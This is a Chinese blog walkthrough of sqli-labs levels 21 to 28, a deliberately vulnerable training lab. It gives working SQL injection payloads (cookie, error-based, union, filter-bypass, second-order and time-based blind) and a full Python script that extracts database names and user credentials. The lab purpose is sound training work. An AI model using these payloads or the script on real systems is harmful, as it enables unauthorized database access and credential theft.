Sqllab闯关记录(21~30)白盒测试

最新推荐文章于 2023-12-22 19:58:13 发布
最新推荐文章于 2023-12-22 19:58:13 发布
阅读量397 收藏 1
点赞数
文章标签: sql 安全 系统安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56375711/article/details/128201031
版权

第21关(cookie注入)

 首先观察源码,发现本关username和password都进行了检查,具体检查函数为check_input(),对字符进行转义,目前无法绕过。

接下来发现另一句sql查询语句,此处cookie没有进行检查,只是对其做了base64编码,然后发现存在msql_error()函数。此关思路清晰,只需闭合cookie字段单引号和括号,和20关不同,这里需要在进行一次base64编码,然后报错注入。

 使用burpsuit抓包,将cookie字段替换为payload为:

Dumb') and updatexml(1,concat(0x7e,database(),0x7e),1)#(此处经过base64编码,如果结果有等号还要进行url编码)

爆出数据库名:security 

 

 接下来就是常规爆数据的payload:(此处payload需要进行base64编码)

爆security的表名:
Dumb') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&submit=Submit
 
爆users的列名:
Dumb') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&submit=Submit
 
爆数据:
Dumb') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&submit=Submit
 
Dumb') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),32,31),0x7e),1)&submit=Submit

 第22关(cookie注入)

 查看源码,发现逻辑和上一关一模一样,只不过此关需要使用双引号闭合,具体操作参考上一关,这里就不重复演示。

payload:(此处payload需要进行base64编码)

爆security的表名:
Dumb" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&submit=Submit
 
爆users的列名:
Dumb" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&submit=Submit
 
爆数据:
Dumb" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&submit=Submit
 
Dumb" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),32,31),0x7e),1)&submit=Submit

 第23关(联合注入)

观察网页源代码,发现对输入的# --进行了过滤,所以不使用报错注入,尝试联合注入。根据后面的sql查询语句,说明是单引号闭合。 

 

 构造paylaod:

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-23/?id=-1’ union select 1,2,3‘

记住后面一定要加单引号 将后面的单引号闭合  否则查询语句会出错。

2和3处有回显,接下来使用下面的payload爆数据即可:

爆所有表
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
 
爆所有列
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'),3--+
 
爆数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(concat(username,0x7e,password)) from security.users),3--+

第24关 (寻找注入点)

 首先在index.php中没有sql查询语句,发现将输入提交到了login.php。

 跟踪代码到login.php,发现还是没有sql语句,而是跳转到pass_change.php。

 在pass_change.php中终于发现了查询语句,一共四个参数,发现其中只有username是在session中直接取得的,其他三个都进行了转义,判断注入点在username处。

 所以,只需新建账户时在username中加入‘#(注意要闭合前面的单引号),即可在修改密码时修改无’#的那个账户的密码(SQL语句变成$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";后面的密码校验失效),实现root账户登录。

 

 第25关(and绕过)

 发现设置了黑名单,所以的or和and不能使用,会检查id的输入。

 既然and不能使用,&&不在黑名单中,所以可以使用&&绕过。构建payload:

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-25/?id=1%27%26%26updatexml(1,concat(0x7e,database(),0x7e),1)--+

 注意此处用&&代替and,必须进行url转码。

例如,Url参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/s?q=abc&ie=utf-8。如果你的value字符串中包含了=或者&,那么势必会造成接收Url的服务器解析错误,因此必须将引起歧义的&和=符号进行转义,也就是对其进行编码。

接下来就是熟悉的爆数据或写木马上去,就不再重复演示,替换updatexml即可。

同时此题可以使用双写绕过,不能使用大小写绕过,因为设置了大小写不区分。

第25-a关

这一关和上一关一样,都过滤了and和or,这关同时关闭了error回显,所以不能使用updataxml报错注入,但可以使用联合查询。同时不需要单引号闭合。 

 

 构造payload:

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-25a/?id=-1%20union%20select%201,2,3%20--+

 2和3有回显,可以使用联合查询爆数据。payload如下:

爆所有库
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
 
爆所有表
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
 
爆所有列
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'),3--+
 
爆数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(concat(username,0x7e,password)) from security.users),3--+

第26关(括号绕过)

 第26关黑名单中加入很多符号,主要是空格和注释符

 构造payload:

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-26/?id=1%27%26%26updatexml(1,concat(0x7e,database(),0x7e),1)%26%26%271%27=%271

 使用&&的url编码绕过and,并且后面要加上‘1’=‘1,来闭合后面的单引号。

成功爆出数据库名。 

接下来是常规的爆数据,不再演示。

第26-a关

查看源码,发现不同的是此关需要’)闭合,而且屏蔽掉了报错信息。 

 

 因为没有报错信息,所以使用时间盲注,构造payload:

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-26a/?id=1%27)%26%26if(length(database())=8,sleep(5),1)%26%26(%271%27)=(%271

页面5秒后加载出来,说明数据库长度为8,注入点找到,接下来就是使用脚本爆破数据。 

#!/usr/bin/python3
# coding=utf-8
 
"""
functions for boolean-based sql injection(GET)
:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""
 
import requests
 
url = "http://192.168.101.16/sqli-labs-master/Less-26a/"               #有可利用漏洞的url,根据实际情况填写
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",}    #http request报文头部,根据实际情况填写
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、可见特殊字符
flag = 'Your Login name'                                        #用于判断附加sql语句为真的字符,根据网页回显填写
 
def Database26A():
    n = 100                                                                     #预测当前数据库名称最大可能的长度,根据实际情况填写
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j<n and j-k>3:
            payload1 = "1') anandd (length((select (group_concat(schema_name)) from (infoorrmation_schema.schemata)))>"+str(j)+")anandd('1')=('1"           #所有payload根据实际情况填写
            param = {
            "id":payload1,
            }
            response = requests.get(url, params = param, headers = headers)     #GET方法发送含payload的request
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload2 = "1') anandd (length((select (group_concat(schema_name)) from (infoorrmation_schema.schemata)))="+str(i)+")anandd('1')=('1"
                param = {
                "id":payload2,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all databases contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload3 = "1') aandnd (substr((select (group_concat(schema_name)) from (infoorrmation_schema.schemata)),"+str(i)+",1)='"+c+"')anandd('1')=('1"
            param = {
            "id":payload3,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                db = db+c
                break
    print("the name of all databases is "+str(db))
    
def Tables26A(database):
    n = 100                                                                     #预测当前数据库中所有表名称最大可能的长度,根据实际情况填写
    k = 0
    j = n//2
    length = 0
    tname = str()
    while True:
        if j>k and j<n and j-k>3:
            payload4 = "1') aandnd (length((select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = '"+database+"')))>"+str(j)+")anandd('1')=('1"
            param = {
            "id":payload4,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload5 = "1') aandnd (length((select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = '"+database+"')))="+str(i)+")anandd('1')=('1"
                param = {
                "id":payload5,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all tables contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload6 = "1') anandd (substr((select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = '"+database+"')),"+str(i)+",1)='"+c+"')anandd('1')=('1"
            param = {
            "id":payload6,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                tname = tname+c
                break
    print("the name of all tables is "+str(tname))
 
 
def Columns26A(database,table):                                                          #table参数是需要爆破的数据表名称,记得加单引号
    n = 200                                                                     #预测某个表所有列名称最大可能的长度,根据实际情况填写
    k = 0
    j = n//2
    length = 0
    cname = str()
    while True:
        if j>k and j<n and j-k>3:
            payload7 = "1') anandd (length((select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = '"+table+"') anandd (table_schema = '"+database+"')))>"+str(j)+")anandd('1')=('1"
            param = {
            "id":payload7,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload8 = "1') anandd (length((select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = '"+table+"') anandd (table_schema = '"+database+"')))="+str(i)+")anandd('1')=('1"
                param = {
                "id":payload8,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all columns in current table contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload9 = "1') anandd (substr((select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = '"+table+"') aandnd (table_schema = '"+database+"')),"+str(i)+",1)='"+c+"')anandd('1')=('1"
            param = {
            "id":payload9,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                cname = cname+c
                break
    print("the name of all columns in current table is "+str(cname))
 
def Content26A(database,table,col1,col2):                                                #table参数是需要爆破的数据表名称,col1和col2是需要爆破内容的列,记得都要加单引号
    n = 200                                                                     #预测期望获取的数据的最大可能的长度,根据实际情况填写
    k = 0
    j = n//2
    length = 0
    content = str()
    while True:
        if j>k and j<n and j-k>3:
            payload10 = "1') aandnd (length((select (group_concat(concat("+col1+",'^',"+col2+"))) from ("+database+"."+table+")))>"+str(j)+")anandd('1')=('1"
            param = {
            "id":payload10,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload11 = "1') anandd (length((select (group_concat(concat("+col1+",'^',"+col2+"))) from ("+database+"."+table+")))="+str(i)+")anandd('1')=('1"
                param = {
                "id":payload11,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the content contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload12 = "1') aandnd (substr((select (group_concat(concat("+col1+",'^',"+col2+"))) from ("+database+"."+table+")),"+str(i)+",1)='"+c+"')anandd('1')=('1"
            param = {
            "id":payload12,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                content = content+c
                break
    print("the content is "+str(content))

 第27关

本关过滤掉了union、select等查询语句以及注释符等。

 

 

 但是没有屏蔽掉报错信息,所以可以updatexml报错注入。

and还是通过&&的url编码绕过,后面使用‘1’=‘1闭合最后的引号(因为注释用不了)。

构造payload:

 http://127.0.0.1/sqli-labs/sqli-labs-master/Less-27/?id=1%27%26%26updatexml(1,concat(0x7e,database(),0x7e),1)%26%26%271%27=%271

 爆出数据库名security,接下来爆数据,不重复演示。

第28关 

 本题需要绕过黑名单,’)闭合,且没有报错信息回显,需要使用联合查询(双写绕过)

 构造payload:

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-28/?id=0%27)%0Aunionunion%0Aselect%0Aselect%0A1,2,3%0Aand%20(%271%27)=(%2716

2处有回显,可以在2处爆数据。不再演示。

 

 

m0_56375711
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记录一下:白盒测试工具集
01-31
工作记录白盒测试
weixin_43761828的博客
11-19 749
Step 1:SDK环境搭建 第一步:建立文件夹toolchain并解压Huanjing.zip/J2AILAB.tar.xz/sampleCode.zip放在其中,压缩包位置如图 第二步:把0615代码交付中dms-postprocess中东西复制过来 将第一步中解压出的三个文件夹放入dms-postprocess/imate目录下,并选择合并替换 第三步:找到下图所示目录下的dms-models.h,并将里面缺失的宏定义补上 第四步:配置docker 安装好docker后,每次执
Sqlilab闯关记录(11~20)(白盒测试
m0_56375711的博客
12-05 802
Sqlilab闯关记录(11~20)(白盒测试
白盒测试实践(小组作业)——每日例会记录12.17
weixin_30633405的博客
12-18 107
工作进展: 召开代码评审会议,参与会议的人员及对应角色如下: 主持人:陈汉 作者:刘伟清 评审员:吕尚维,李璋毅,储志峰 记录:翟瑆 填写会议纪要和评审结果报告。 具体情况说明: (1)被测模块选择本系统最核心的功能,即对学生的身份进行操作以及学生的创建和删除功能,原因是该模块是本系统的最常用也是最重要的功能,肯定是测试的首选。 (2)静态评审报告是由翟瑆同学最终汇总所有评审记录...
12月19日 白盒测试博客记录
weixin_30470643的博客
12-19 193
12月19日、周二 例会记录: 今天进行项目进度汇总、讨论目前遇到的瓶颈和下一步需要完成的工作。 首先统计了已经完成的项目清单,包括阶段一的学习过程和文档,即测试用例清单。其次包括第二阶段的静态评审会议已经结束。 目前在正在进行的工作主要有: 1. 评审会议纪要和评审结果报告的编写,由郭伟和程至炜负责。 2. 进行单元测试的学习和脚本编写,由吴宗森负责。 3. 学习静态检查工具...
白盒测试流程图1
08-08
白盒测试流程图1 白盒测试流程图1是软件测试的一种,旨在通过检查软件的内部结构和执行流程来发现错误和缺陷。白盒测试是一种静态测试方法,通过检查代码的逻辑性和一致性来确保软件的正确性。 白盒测试流程图1的...
开关电源白盒测试规范.doc
05-28
9. 功率器件应力测试:电压降额、测试记录表、结温降额、电流降额等参数的测试和检测。 知识点:功率器件的原理和应用、电压降额和电流降额的影响和控制。 10. 驱动用三极管、启动电路三极管电压应力测试:驱动用...
白盒测试实验 软件测试实验报告
09-16
软件测试实验报告 题目一:用逻辑覆盖测试方法测试以下程序段 void DoWork (int x,int y,int z){ 1 int k=0, j=0; 2 if ( (x>3)&&(z) ) 3 { 4 k=x*y-1; 5 j=sqrt(k); 6 } 7 if((x==4)||(y>5)) 8 j=x*y+10; 9 j=j%3; ...
白盒测试之基本路径测试
03-23
白盒测试测试方法有代码检查法、静态结构分析法、静态质量度量法、逻辑覆盖法、基本路径测试法、域测试、符号测试、Z路径覆盖、程序变异。其中运用最为广泛的是基本  白盒测试测试方法有代码检查法、静态结构...
12月18日 白盒测试博客记录
weixin_30951743的博客
12-18 78
12月18日、周一 例会记录: 今天例会的主要目的是进行静态代码审查进行学习,并对所选择的web系统进行静态评审,学习的主要材料来自于mooc平台视频内容,学习时长1小时。 随后我们对该系统进行静态评审,评审的过程和结果由郭伟、程至炜同学进行记录和总结,对应的提交文档是评审会议纪要和评审结果报告。 因为设备原因,评审会议的照片会在后面几天进行补充: 项目进度记录如下: ...
从黑盒和白盒来测试SQL
mindclicer的博客
04-29 261
对如何测试SQL的思考
白盒测试之静态检查--sql检测器设计
shahaizimxm的专栏
11-17 863
今天开发了五个检测器,用于检测代码中的sql ,判断是否存在优化的可能,是否违反了相应的优化规则。规则如下:1、PERFORMANCE _DB_SQL_NULL   sql语句使用了is null、is not null2、PERFORMANCE _DB_SQL_NOTQEUAL  sql语句使用了不等号3、PERFORMANCE _DB_SQL_CANCAT_FIELD  sql语句使用了字段连接号4、PERFORMANCE _DB_SQL_NOTIN  sql语句使用了not in5、PERF
白盒测试总结+实例
vimpirespider的博客
05-04 3976
一、逻辑覆盖 逻辑覆盖按覆盖程度由低到高大致分为以下几类: (1)语句覆盖:设计若干测试用例,使程序中每一可执行语句至少执行一次; (2)判定覆盖:设计用例,使程序中的每个逻辑判断的取真取假分支至少经历一次; (3)条件覆盖:设计用例,使判断中的每个条件的可能取值至少满足一次; (4)判定/条件覆盖:设计用例,使得判断中的每个条件的所有可能结果至少出现一次,而且判断本身所有可能结果也至少出现一次; (5)修正判定/条件覆盖:判定中每个条件的所有可能结果至少出现一次,每个判定本身的所有...
sqli-labs第二十一关详解(这次用sqlmap)
金 帛的博客
05-09 2688
SQL靶场第二十一关答案详解,这次用sqlmap跑
白盒测试(超详细整理)
最新发布
huace3852的博客
12-22 1816
白盒测试方法基于被测程序的源代码开发测试用例。常见的白盒测试方法有逻辑覆盖、数据流测试、路径分析以及程序插装等。逻辑覆盖以程序内部的逻辑结构为基础设计测试用例,要求对被测程序的结构作到一定程度的覆盖,如语句覆盖、判定覆盖、条件覆盖、判定/条件覆盖、条件组合覆盖及路径覆盖。路径覆盖是最强的逻辑覆盖准则,实际上我们只能有选择地测试程序中某些有代表的性路径。这些资料,对于做【软件测试】的朋友来说应该是最全面最完整的备战仓库,这个仓库也陪伴我走过了最艰难的路程,希望也能帮助到你!
PL/SQL WhiteBoxTester PL/SQL白盒测试工具
ct827519的博客
06-21 146
不说了,看图吧:0.1.jpg0.2.jpg0.3.jpg0.4.jpg0.5.jpg1.jpg2.jpg PLSQL WriteBoxTester.rar(2008-01-15 17:13:41, Size: 1.2 MB,...
Rebotium 简单黑盒/白盒测试记录(Android studio)
冰川孤辰的专栏
07-01 3559
在Android Stu;dio 中使用Robotium进行黑盒/白盒测试
sqli-labs靶场第二十一关
gou1791241251的博客
12-31 1318
此关有点特别,虽然是cookie注入,但是是经过编码的 发现cookie那里的值为RHVtYg== 非常像base64编码过的。我们就来尝试一下经过编码再进行注入 把单引号经过编码之后再放入cookie中。 发现报错了!说明闭合方式是有关单引号的,那么就先不考虑双引号了!! 这里我将’ and 1=1 # 经过编码放入cookie中请求,发现还是报错,说明闭合方式不仅仅是单引号! 尝试一下括号。 页面没有报错了,说明闭合方式就是 ‘) 那么现在用报错注入来进行获取一下信息吧 ‘) and ex
白盒测试
m0_37449634的博客
12-18 557
1、什么是白盒测试 定义:按照程序内部结构,逻辑驱动测试程序 目的:检测产品内部动作是否按照设计说明书的规范进行,检验程序的每条路径是否都能按照预定要求进行工作 对象:源程序 用代码内部的分支,路径,条件,使程序设计的控制结构导出测试用例 2、白盒测试方法分类 ①、静态测试 ②、动态测试 3、白盒测试的原则 ①、保证一个模块中所有路径至少被测试一次 ②、所有逻辑值都要测试真和假两种情况 ③、检查程序内部的数据结构是否有效 ④、检查上下边界及可操作范围内运行所有循环 ...
白盒测试条件测试讲解
"条件测试-白盒测试PPT讲稿" 这篇讲稿主要涵盖了软件测试的基础知识,特别是关于条件测试白盒测试的介绍。条件测试是软件测试的一种方法,其核心在于验证程序模块中的逻辑条件。它涉及到对布尔变量、关系表达式、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值